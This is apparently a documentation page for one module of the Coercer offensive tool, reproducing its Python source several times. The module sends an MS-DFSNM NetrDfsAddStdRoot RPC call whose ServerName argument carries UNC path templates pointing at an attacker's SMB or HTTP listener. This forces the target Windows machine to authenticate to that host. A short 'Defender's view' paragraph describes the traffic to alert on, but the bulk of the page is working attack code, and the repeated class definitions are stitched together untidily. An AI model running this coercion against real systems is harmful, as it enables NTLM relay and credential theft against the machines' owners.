coercer.methods.MS_DFSNM.NetrDfsAddStdRoot

 1#!/usr/bin/env python3
 2# -*- coding: utf-8 -*-
 3# File name          : NetrDfsAddStdRoot.py
 4# Author             : Podalirius (@podalirius_)
 5# Date created       : 14 Sep 2022
 6
 7from coercer.core.utils import gen_random_name
 8from coercer.models.MSPROTOCOLRPCCALL import MSPROTOCOLRPCCALL
 9from coercer.network.DCERPCSessionError import DCERPCSessionError
10from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT
11from impacket.dcerpc.v5.dtypes import UUID, ULONG, WSTR, DWORD, LONG, NULL, BOOL, UCHAR, PCHAR, RPC_SID, LPWSTR, GUID
12
13
class _NetrDfsAddStdRoot(NDRCALL):
    """
    Structure to make the RPC call to NetrDfsAddStdRoot() in MS-DFSNM Protocol

    Request structure for opnum 12 of the MS-DFSNM interface. The field names
    follow the parameters of NetrDfsAddStdRoot(); NetrDfsAddStdRoot.trigger()
    fills them in, giving every WSTR field an explicit trailing NUL.
    """
    opnum = 12
    structure = (
        ('ServerName', WSTR),  # Type: WCHAR *  -- receives self.path; the argument named in function["vulnerable_arguments"]
        ('RootShare', WSTR),   # Type: WCHAR *  -- random name, only needs to be well-formed
        ('Comment', WSTR),     # Type: WCHAR *  -- random name, only needs to be well-formed
        ('ApiFlags', DWORD),   # Type: DWORD    -- always 0 in trigger()
    )
25
26
class _NetrDfsAddStdRootResponse(NDRCALL):
    """
    Structure to parse the response of the RPC call to NetrDfsAddStdRoot() in MS-DFSNM Protocol

    Declared with no fields: this module never reads anything back from the
    response, and trigger() does not use the value returned by
    dcerpc_session.request().

    NOTE(review): the specification gives this call a NET_API_STATUS return
    value, which is not declared here -- so a non-zero status from the server
    is not surfaced by this module. Confirm whether the session layer raises
    on RPC faults instead.
    """
    structure = ()
32
33
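class NetrDfsAddStdRoot(MSPROTOCOLRPCCALL):
    """
    Coercing a machine to authenticate using function NetrDfsAddStdRoot (opnum 12) of [MS-DFSNM]: Distributed File System (DFS): Namespace Management Protocol (https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-dfsnm/95a506a8-cae6-4c42-b19d-9c1ed1223979)

    Method found by:
     - [@filip_dragovic](https://twitter.com/filip_dragovic)

    How the pieces fit together: the only argument this method cares about is
    ``ServerName`` (the one listed in ``function["vulnerable_arguments"]``);
    ``trigger()`` copies ``self.path`` into it and fills the remaining
    parameters with random but well-formed values. ``self.path`` is not set in
    this class -- it is assumed to be one of the ``exploit_paths`` templates
    rendered by the MSPROTOCOLRPCCALL base class (confirm there).

    Defender's view: the request travels over the ``netdfs`` named pipe
    (ncacn_np) or ncacn_ip_tcp to interface 4fc742e0-4a10-11cf-8273-00aa004ae673
    v3.0, and the expected side effect is an outbound SMB or HTTP connection
    from the target towards the listener named in the path. That outbound
    connection, following a call to opnum 12 on this interface, is the
    artefact to alert on.
    """

    # Templates for the value placed into ServerName. Every template ends with an
    # explicit NUL, matching the NUL trigger() appends to the other WSTR fields.
    exploit_paths = [
        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
        ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00'),
    ]

    # Transports the call can be made over, keyed by protocol sequence.
    # NOTE(review): the first key is spelled "ncan_np" (not "ncacn_np" like its
    # sibling); the framework presumably matches that spelling, so do not rename
    # it here without changing the consumer as well.
    access = {
        "ncan_np": [
            {
                "namedpipe": r"\PIPE\netdfs",
                "uuid": "4fc742e0-4a10-11cf-8273-00aa004ae673",
                "version": "3.0"
            }
        ],
        "ncacn_ip_tcp": [
            {
                "uuid": "4fc742e0-4a10-11cf-8273-00aa004ae673",
                "version": "3.0"
            }
        ]
    }

    # Human-readable protocol identification used by the framework's reporting.
    protocol = {
        "longname": "[MS-DFSNM]: Distributed File System (DFS): Namespace Management Protocol",
        "shortname": "MS-DFSNM"
    }

    # Which RPC function is called and which of its arguments carries the path.
    function = {
        "name": "NetrDfsAddStdRoot",
        "opnum": 12,
        "vulnerable_arguments": ["ServerName"]
    }

    def trigger(self, dcerpc_session, target):
        """
        Send one NetrDfsAddStdRoot request over an already bound DCE/RPC session.

        Args:
            dcerpc_session: bound DCE/RPC session (produced by a connect() step
                that is not part of this class); ``None`` means nobody connected.
            target: not used by this method; kept for the common trigger() signature.

        Returns:
            ``""`` when ``dcerpc_session.request()`` completed without raising,
            the caught ``Exception`` object (returned, not raised) when it failed,
            ``None`` when no session was supplied.
        """
        if dcerpc_session is None:
            print("[!] Error: dce is None, you must call connect() first.")
            return None
        try:
            request = _NetrDfsAddStdRoot()
            # ServerName is the argument that receives the path (see function["vulnerable_arguments"]).
            request['ServerName'] = self.path
            # RootShare and Comment only need to be well-formed; each WSTR gets an explicit NUL terminator.
            request['RootShare'] = gen_random_name() + '\x00'
            request['Comment'] = gen_random_name() + '\x00'
            request['ApiFlags'] = 0
            # The response structure declared in this module has no fields, so the
            # return value of request() is intentionally not kept.
            dcerpc_session.request(request)
            return ""
        except Exception as err:
            # Project convention: failures are reported by returning the exception.
            return err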
class NetrDfsAddStdRoot(coercer.models.MSPROTOCOLRPCCALL.MSPROTOCOLRPCCALL):
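class NetrDfsAddStdRoot(MSPROTOCOLRPCCALL):
    """
    Coercing a machine to authenticate using function NetrDfsAddStdRoot (opnum 12) of [MS-DFSNM]: Distributed File System (DFS): Namespace Management Protocol (https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-dfsnm/95a506a8-cae6-4c42-b19d-9c1ed1223979)

    Method found by:
     - [@filip_dragovic](https://twitter.com/filip_dragovic)

    How the pieces fit together: the only argument this method cares about is
    ``ServerName`` (the one listed in ``function["vulnerable_arguments"]``);
    ``trigger()`` copies ``self.path`` into it and fills the remaining
    parameters with random but well-formed values. ``self.path`` is not set in
    this class -- it is assumed to be one of the ``exploit_paths`` templates
    rendered by the MSPROTOCOLRPCCALL base class (confirm there).

    Defender's view: the request travels over the ``netdfs`` named pipe
    (ncacn_np) or ncacn_ip_tcp to interface 4fc742e0-4a10-11cf-8273-00aa004ae673
    v3.0, and the expected side effect is an outbound SMB or HTTP connection
    from the target towards the listener named in the path. That outbound
    connection, following a call to opnum 12 on this interface, is the
    artefact to alert on.
    """

    # Templates for the value placed into ServerName. Every template ends with an
    # explicit NUL, matching the NUL trigger() appends to the other WSTR fields.
    exploit_paths = [
        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
        ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00'),
    ]

    # Transports the call can be made over, keyed by protocol sequence.
    # NOTE(review): the first key is spelled "ncan_np" (not "ncacn_np" like its
    # sibling); the framework presumably matches that spelling, so do not rename
    # it here without changing the consumer as well.
    access = {
        "ncan_np": [
            {
                "namedpipe": r"\PIPE\netdfs",
                "uuid": "4fc742e0-4a10-11cf-8273-00aa004ae673",
                "version": "3.0"
            }
        ],
        "ncacn_ip_tcp": [
            {
                "uuid": "4fc742e0-4a10-11cf-8273-00aa004ae673",
                "version": "3.0"
            }
        ]
    }

    # Human-readable protocol identification used by the framework's reporting.
    protocol = {
        "longname": "[MS-DFSNM]: Distributed File System (DFS): Namespace Management Protocol",
        "shortname": "MS-DFSNM"
    }

    # Which RPC function is called and which of its arguments carries the path.
    function = {
        "name": "NetrDfsAddStdRoot",
        "opnum": 12,
        "vulnerable_arguments": ["ServerName"]
    }

    def trigger(self, dcerpc_session, target):
        """
        Send one NetrDfsAddStdRoot request over an already bound DCE/RPC session.

        Args:
            dcerpc_session: bound DCE/RPC session (produced by a connect() step
                that is not part of this class); ``None`` means nobody connected.
            target: not used by this method; kept for the common trigger() signature.

        Returns:
            ``""`` when ``dcerpc_session.request()`` completed without raising,
            the caught ``Exception`` object (returned, not raised) when it failed,
            ``None`` when no session was supplied.
        """
        if dcerpc_session is None:
            print("[!] Error: dce is None, you must call connect() first.")
            return None
        try:
            request = _NetrDfsAddStdRoot()
            # ServerName is the argument that receives the path (see function["vulnerable_arguments"]).
            request['ServerName'] = self.path
            # RootShare and Comment only need to be well-formed; each WSTR gets an explicit NUL terminator.
            request['RootShare'] = gen_random_name() + '\x00'
            request['Comment'] = gen_random_name() + '\x00'
            request['ApiFlags'] = 0
            # The response structure declared in this module has no fields, so the
            # return value of request() is intentionally not kept.
            dcerpc_session.request(request)
            return ""
        except Exception as err:
            # Project convention: failures are reported by returning the exception.
            return err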

Coercing a machine to authenticate using function NetrDfsAddStdRoot (opnum 12) of [MS-DFSNM]: Distributed File System (DFS): Namespace Management Protocol (https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-dfsnm/95a506a8-cae6-4c42-b19d-9c1ed1223979)

Method found by:

exploit_paths = [('smb', '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'), ('smb', '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'), ('smb', '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'), ('http', '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00')]
access = {'ncan_np': [{'namedpipe': '\\PIPE\\netdfs', 'uuid': '4fc742e0-4a10-11cf-8273-00aa004ae673', 'version': '3.0'}], 'ncacn_ip_tcp': [{'uuid': '4fc742e0-4a10-11cf-8273-00aa004ae673', 'version': '3.0'}]}
protocol = {'longname': '[MS-DFSNM]: Distributed File System (DFS): Namespace Management Protocol', 'shortname': 'MS-DFSNM'}
function = {'name': 'NetrDfsAddStdRoot', 'opnum': 12, 'vulnerable_arguments': ['ServerName']}
def trigger(self, dcerpc_session, target):
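    def trigger(self, dcerpc_session, target):
        """
        Send one NetrDfsAddStdRoot request over an already bound DCE/RPC session.

        Args:
            dcerpc_session: bound DCE/RPC session (produced by a connect() step
                that is not part of this method); ``None`` means nobody connected.
            target: not used by this method; kept for the common trigger() signature.

        Returns:
            ``""`` when ``dcerpc_session.request()`` completed without raising,
            the caught ``Exception`` object (returned, not raised) when it failed,
            ``None`` when no session was supplied.
        """
        if dcerpc_session is None:
            print("[!] Error: dce is None, you must call connect() first.")
            return None
        try:
            request = _NetrDfsAddStdRoot()
            # ServerName is the argument that receives self.path -- presumably a rendered
            # exploit_paths template set by the base class; confirm against MSPROTOCOLRPCCALL.
            request['ServerName'] = self.path
            # RootShare and Comment only need to be well-formed; each WSTR gets an explicit NUL terminator.
            request['RootShare'] = gen_random_name() + '\x00'
            request['Comment'] = gen_random_name() + '\x00'
            request['ApiFlags'] = 0
            # The response structure declared in this module has no fields, so the
            # return value of request() is intentionally not kept.
            dcerpc_session.request(request)
            return ""
        except Exception as err:
            # Project convention: failures are reported by returning the exception.
            return err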